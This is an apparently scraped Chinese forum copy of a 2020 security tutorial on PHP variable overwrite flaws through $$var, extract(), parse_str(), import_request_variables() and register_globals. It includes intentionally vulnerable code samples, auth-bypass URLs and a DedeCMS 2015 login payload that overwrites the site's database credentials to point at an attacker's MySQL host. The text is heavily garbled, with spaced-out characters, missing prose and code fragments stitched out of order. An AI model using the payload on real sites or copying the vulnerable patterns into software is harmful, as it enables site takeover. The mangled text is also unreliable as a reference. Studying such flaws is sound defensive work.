[21106] 2020-06-25_变量覆盖漏洞

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2020-06-25_变量覆盖漏洞 L e m o n S e c   2 0 2 0 - 0 6 - 2 5 x x x 使 e x t r a c t ( ) , p a r s e _ s t r ( ) i m p o r t _ r e q u e s t _ v a r i a b l e s ( ) d e d e c m s 2 0 1 5 h t t p : / / w w w . x x . c o m / < ? p h p $ a = ' a a a ' ; $ a a a = ' x x x ' ; e c h o   $ $ a ;   / / $ $ a = $ ( $ a ) = $ ( a a a ) = ' x x x ' ? > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = u t f - 8 " / > < ? p h p $ a = ' a a ' ; $ a a = ' 1 2 3 ' ; e c h o   ' a a ' . $ a a . ' < b r > ' ; $ $ a = $ _ G E T [ ' n a m e ' ] ; e c h o   ' a a ' . $ a a . ' < b r > ' ;   / / $ $ a = $ ( $ a ) = $ a a = $ _ G E T ? >
/ l o g i n . p h p ? d o p o s t = l o g i n & v a l i d a t e = d c u g & u s e r i d = & p w d = &   _ P O S T [ G L O B A L S ]   [ c f g _ d b h o s t ] = M Y S Q L I P & _ P O S T [ G L O B A L S ]   [ c f g _ d b u s e r ] = M Y S Q L & _ P O S T [ G L O B A L S ] [ c f g _ d b p w d ] = M Y S Q L & _ P O S T [ G L O B A L S ]   [ c f g _ d b n a m e ] = d e d e c m s   r e g i s t e r _ g l o b a l = O N C o o k i e r e g i s t e r _ g l o b a l s = O F F r e g i s t e r _ g l o b a l s = O N U R L h t t p : / / w w w . a . c o m / t e s t . p h p ? a u t h = 1 , $ a u t h R e g i s t e r _ g l o b a l s : 1 p r i v a t e ! $ a u t h $ a u t h = 0 使 U R L / t e s t . p h p ? a u t h = 1 p r i v a t e $ G L O B A L S $ a r e g i s t e r _ g l o b a l s = O N $ a h t t p : / / w w w . a . c o m / t e s t 1 . p h p ? a = 1 & b = 2 G L O B A L S [ a ] h t t p : / / w w w . a . c o m / t e s t 1 . p h p ? G L O B A L S [ a ] = 1 & b = 2 $ a u n s e t ( ) 使 $ G L O B A L S r e g i s t e r _ g l o b a l s = O F F r e g i s t e r _ g l o b a l s O n 使 O F F u n s e t e x t r a c t ( ) < ? p h p e c h o   " R e g i s t e r _ g l o b a l s :   " . ( i n t ) i n i _ g e t ( " r e g i s t e r _ g l o b a l s " ) . " < b r / > " ; i f   ( $ a u t h ) {       e c h o   " p r i v a t e ! " ; } ? > < ? p h p e c h o   " R e g i s t e r _ g l o b a l s : " . ( i n t ) i n i _ g e t ( " r e g i s t e r _ g l o b a l s " ) . " < b r / > " ; i f   ( i n i _ g e t ( ' r e g i s t e r _ g l o b a l s ' ) )   f o r e a c h ( $ _ R E Q U E S T   a s   $ k = > $ v )   u n s e t ( $ { $ k } ) ; p r i n t   $ a ; p r i n t   $ _ G E T [ b ] ; ? > < ? p h p $ a u t h   =   ' 0 ' ; e x t r a c t ( $ _ G E T ) i f ( $ a u t h = = 1 ) { e c h o   " p r i v a t e ! " ; } e l s e {
h t t p : / / w w w . a . c o m / t e s t 1 . p h p ? a u t h = 1 p r i v a t e r e g i s t e r _ g l o b a l s = O F F e x t r a c t ( ) 使 E X T R _ S K I P P H P   e x t r a c t ( )   c h s " $ c h s " $ $ k i m p o r t _ r e q u e s t _ v a r i a b l e s h t t p : / / w w w . a . c o m / t e s t 1 . p h p ? a u t h = 1 p r i v a t e i m p o r t _ r e q u e s t _ v a r i a b l e s ( ' G ' ) G E T i m p o r t _ r e q u e s t _ v a r i a b l e s       G E T P O S T C o o k i e     r e g i s t e r _ g l o b a l s p a r s e _ s t r ( ) p a r s e _ s t r ( ) m b _ p a r s e _ s t r ( ) p a r s e _ s t r     s t r U R L q u e r y   s t r i n g } e l s e { e c h o   " p u b l i c ! " ; } ? > < ?             $ c h s   =   ' ' ;             i f ( $ _ P O S T   & &   $ c h a r s e t   ! =   ' u t f - 8 ' ) {                     $ c h s   =   n e w   C h i n e s e ( ' U T F - 8 ' ,   $ c h a r s e t ) ;                     f o r e a c h ( $ _ P O S T   a s   $ k e y   = >   $ v a l u e ) {                             $ $ k e y   =   $ c h s - > C o n v e r t ( $ v a l u e ) ;                     }                     u n s e t ( $ c h s ) ;             }             ? > < ? p h p             $ a u t h   =   ' 0 ' ;             i m p o r t _ r e q u e s t _ v a r i a b l e s ( ' G ' ) ;                         i f ( $ a u t h   = =   1 ) {                 e c h o   " p r i v a t e ! " ;             } e l s e {                 e c h o   " p u b l i c ! " ;             }             ? > / / v a r . p h p ? v a r = n e w     $ v a r = ' i n i t ' ;     p a r s e _ s t r ( $ _ S E R V E R [ ' Q U E R Y _ S T R I N G ' ] ) ;     p r i n t   $ v a r ;
    f o r e a c h D r K a n g   h t t p s : / / w w w . c n b l o g s . c o m / d r k a n g / p / 8 6 8 9 2 0 5 . h t m l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则